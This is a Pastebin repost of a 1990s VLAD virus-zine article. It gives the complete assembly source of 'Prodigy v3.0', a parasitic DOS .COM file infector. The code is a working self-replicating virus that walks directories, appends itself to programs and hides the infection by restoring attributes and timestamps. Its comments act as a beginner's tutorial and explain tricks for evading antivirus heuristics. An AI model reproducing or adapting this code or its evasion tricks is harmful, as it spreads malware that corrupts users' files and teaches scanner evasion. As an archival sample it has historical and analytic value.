FlyFar

VLAD Magazine - Issue #2 - ARTICLE.4_5 - Prodigy 3 Virus Source Code

Jun 29th, 2023
120
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 10.19 KB | Cybersecurity | 0 0
  1. ; - [Prodigy] v3.0
  2. ;   Metabolis/VLAD
  3. ;                                _   _  .---------.
  4. ;                               | | |_| |  T H E  |
  5. ;                               | |  _  `---------'
  6. ;    _____   _____   _____   ___| | | |  ______  _   _
  7. ;   |  _  | | .-. | |  _  | |  _  | | | |  ___/ | | | |
  8. ;   | |_| | | `-' | | |_| | | |_| | | | | |___  | | | |
  9. ;   |  ___| |_|~\_\ |_____| |_____| |_|  \_,. | |_|_|_|
  10. ;   | |     .---------------------.         | |   | |
  11. ;   | |     |  -  VIRUS! v3.0  -  |         | |   | |
  12. ;   |_|     `---------------------'         |_|   |_|
  13. ;
  14. ; - Direct Action, Parasitic .COM infector
  15. ; - Restores original attributes and file date/time
  16. ; - Searches '..' until there are no more files to infect
  17. ; - Won't infect COMMAND.COM
  18. ; - Has an infection counter (set to infect 2 at a time right now)
  19. ;
  20. ; - sure, this virus is simple, and not really worth releasing.. but
  21. ;   not everyone is up to understanding Qark's level of code,
  22. ;   certainly not me.  So for the people who are just starting off
  23. ;   take a look at this one.  It's the 3rd virus I've written, the
  24. ;   other 2 definately not worth publishing :) hehe
  25. ;
  26. ; - Use a86 to compile
  27.  
  28.         org     0100h                           ; yer COM file starts
  29.                                                 ; at this mem address
  30.  
  31.         db 0e9h,00h,00h                         ; jump to begin
  32.  
  33. begin:
  34.         call    $+3                             ; get the delta offset
  35. next:   int     3h                              ; (overcomes 'E' heuristic)
  36.         pop     bp                              ; for the virus and
  37.         sub     bp, offset next                 ; stick it in BP
  38.  
  39. set_dta:
  40.  
  41.         lea     si, [bp+offset first3]
  42.         mov     di, 100h
  43.         movsw
  44.         movsb
  45.  
  46.         ; the virus puts the original three bytes of the program back
  47.         ; at 100h so all we have to do at the end of the virus is jump
  48.         ; to 100h and it will execute the infected program as normal
  49.  
  50.         mov     byte ptr [bp+counter], 00h      ; initialise infection
  51.                                                 ; counter
  52.         mov     ah,47h                          ; get current directory
  53.         xor     dl,dl                           ; and put it in currdir
  54.         lea     si,[bp+offset currdir]          ; (dl=0 <- default drive)
  55.         int     21h
  56.  
  57.         mov     ah,1Ah                          ; Set DTA to buffer
  58.         lea     dx,[bp+offset tempDTA]          ; so command line params
  59.         int     21h                             ; aren't overwritten
  60.  
  61. find_first:
  62.  
  63.         mov     ah,4eh                          ; find first file
  64.         mov     cx,7                            ; with any attributes
  65.         dec     byte ptr [bp+offset mask]
  66.  
  67.         ; the reason I dec the '+' in the filemask is because this
  68.         ; makes it an asterisk.  This will get past scanners picking
  69.         ; up *.COM as a heuristic.
  70.  
  71.         lea     dx,[bp+offset mask]             ; look for *.COM
  72.         int     21h
  73.         inc     byte ptr [bp+offset mask]
  74.  
  75.         ; this restores the '*' in the filemask to '+' for writing
  76.         ; back to disk.
  77.  
  78.         jnc     open_file                       ; no files to infect..
  79.         jmp     load_com
  80.  
  81. fn:
  82.         jmp     find_next
  83.  
  84.         ; find_next is too far from most places so I've set this up to
  85.         ; make life easier :) it gets around the jump > 128 error.
  86.  
  87. open_file:
  88.  
  89.         ; when a file is found with either find first or find next
  90.         ; all of its details like size, attributes, name etc are stored
  91.         ; in an area called DTA which resides at 80h (just before the
  92.         ; COM itself at 100h).  In this case, the DTA has been moved
  93.         ; to another address.  The different details are positioned
  94.         ; at various positions from 80h.  9eh for instance is the
  95.         ; position of the filename (ASCIIZ)
  96.  
  97.         cmp     word ptr [bp+tempDTA+1eh],'OC'  ; don't infect command.com
  98.         je      fn                              ; uh oh.. find another file
  99.         lea     dx,[bp+tempDTA+1eh]             ; filename in DTA
  100.         mov     ax,4301h                        ; put normal attributes
  101.         mov     cx,20h                          ; on the file
  102.         int     21h
  103.         jc      fn                              ; error, we outta here
  104.         mov     ax,3D02h                        ; open that file!
  105.         lea     dx,[bp+tempDTA+1eh]             ; filename in DTA
  106.         int     21h
  107.         jc      fn                              ; can't open file :(
  108.         xchg    bx,ax                           ; put file handle in BX
  109.  
  110. infect:
  111.         mov     cx,3                            ; read 3 bytes from file
  112.         mov     ah,03Fh                         ; and stick them in first3
  113.         lea     dx,[bp+offset first3]
  114.         int     021h
  115.  
  116.         lea     cx,word ptr [bp+offset first3]  ; put the first 2 bytes of
  117.                                                 ; the file in cx
  118.         add     cl,ch                           ; add the two bytes together
  119.         cmp     cl,167                          ; M+Z=167 ?
  120.         je      fn
  121.  
  122.         ; if I simply compared the first two bytes to 'MZ' (or 'ZM' since
  123.         ; it would be a word) this would set off a tbscan heuristic, so
  124.         ; I've used the adding method, although N+Y=167 it is not really
  125.         ; worth worrying about, I have seen the first two bytes of a COM
  126.         ; file equal 167 yet.
  127.  
  128.         call    lseek_end                       ; move to the end of the file
  129.  
  130.         sub     ax,heap-begin+3                 ; subtract the virus length
  131.         cmp     word ptr [bp+first3+1],ax       ; see if jump is to virus
  132.         je      fn                              ; file already infected
  133.         add     ax,heap-begin                   ; add on to know where to
  134.         mov     word ptr [bp+infjump+1],ax      ; jump to and fix it up
  135.  
  136.         mov     ax,4200h                        ; lseek to beginning of file
  137.         cwd                                     ; xor dx,dx
  138.         xor     cx,cx
  139.         int     21h
  140.  
  141.         mov     cx,3                            ; write 3 bytes to file
  142.         mov     ah,40h                          ; (the new jump to the
  143.         lea     dx,[bp+offset infjump]          ; virus)
  144.         int     21h
  145.  
  146.         call    lseek_end                       ; move to the end of the file
  147.  
  148.         mov     cx,heap-begin                   ; write the virus
  149.         mov     ah,40h                          ; to the end of the
  150.         lea     dx,[bp+offset begin]            ; file
  151.         int     21h
  152.  
  153.         call    close_file
  154.  
  155. load_com:
  156.  
  157.         inc     byte ptr [bp+counter]           ; add one to the counter
  158.         cmp     byte ptr [bp+counter],2         ; check if X files have
  159.         jne     find_next                       ; been infected
  160.  
  161.         mov     ah, 1Ah                         ; restore DTA to original
  162.         mov     dx, 80h                         ; position
  163.         int     21h
  164.  
  165.         mov     ah,3bh                          ; Change directory
  166.         lea     dx,[bp+offset slash]            ; to the way it was
  167.         int     21h                             ; before the dot dot
  168.  
  169.         mov     bx,101h                         ; we need to jump to 100h
  170.         dec     bx                              ; this will knock out a
  171.         jmp     bx                              ; tbscan heuristic :)
  172.  
  173. find_next:
  174.  
  175.         call    close_file                      ; make sure file is closed
  176.  
  177.         mov     ah,4fh                          ; find next file
  178.         int     21h
  179.         jc      dot_dot
  180.         jmp     open_file                       ; infect the bastard!
  181.  
  182. dot_dot:
  183.  
  184.         mov     ah,3bh                          ; change directory
  185.         lea     dx,[bp+offset dds]              ; to '..' from the
  186.         int     21h                             ; current directory
  187.         jc      load_com
  188.         jmp     find_first
  189.  
  190. close_file:
  191.  
  192.         xor     cx,cx
  193.         mov     cl,byte ptr [bp+tempdta+15h]    ; get old attr from DTA
  194.         lea     dx,[bp+TempDTA+1eh]             ; position of filename in DTA
  195.         mov     ax,4301h                        ; set attr to original
  196.         int     21h
  197.         mov     cx,word ptr [bp+tempDTA+16h]    ; date and time
  198.         mov     dx,word ptr [bp+tempDTA+18h]    ; date and time
  199.         mov     ax,5701h                        ; set file date/time
  200.         int     21h
  201.         mov     ah,3eh                          ; close file
  202.         int     21h
  203.         ret
  204.  
  205. lseek_end:
  206.         mov     ax,4202h                        ; get to the end
  207.         cwd                                     ; of the file (xor dx,dx)
  208.         xor     cx,cx
  209.         int     21h
  210.         ret
  211.  
  212. quote   db      0dh,0ah
  213.         db      '[Prodigy] v3.0 by Metabolis/VLAD',0dh,0ah
  214.         db      '"Feel the jungle vibe baby"',0dh,0ah
  215.         db      '"In the jungle, In the jungle.."',0dh,0ah
  216.  
  217.         ; [Prodigy] v3.0 by Metabolis/VLAD
  218.         ; "Feel the jungle vibe baby"
  219.         ; "In the jungle, In the jungle.."
  220.  
  221.         ; Quote from "Ruff in the jungle bizness" by the Prodigy :)
  222.  
  223. infjump db      0e9h,00h,00h                    ; jump to the virus
  224. first3  db      0cdh,20h,00h                    ; First 3 bytes of the
  225.                                                 ; com file that was infected
  226. dds     db      '..',00                         ; '..' for dir recursor
  227. mask    db      '+','.COM',00                   ; filemask (for finding files)
  228. slash   db      '\'                             ; fix for currdir
  229.  
  230.         ; when you use the get current directory function it doesn't
  231.         ; put a '\' at the beginning of it, so it's not possible to
  232.         ; change to the directory if you store it straight away,
  233.         ; that's why I change to directory from offset slash rather
  234.         ; than currdir since it's ASCIIZ.. (string ending in a zero)
  235.  
  236. heap:
  237.  
  238. currdir db      64 dup (?)                      ; storage for default dir
  239. counter db      00                              ; infection counter
  240. tempdta db      43 dup (?)
  241.  
  242.         ; everything after heap doesn't actually get written to disk when
  243.         ; the virus infects a file.
  244.  
Add Comment
Please, Sign In to add comment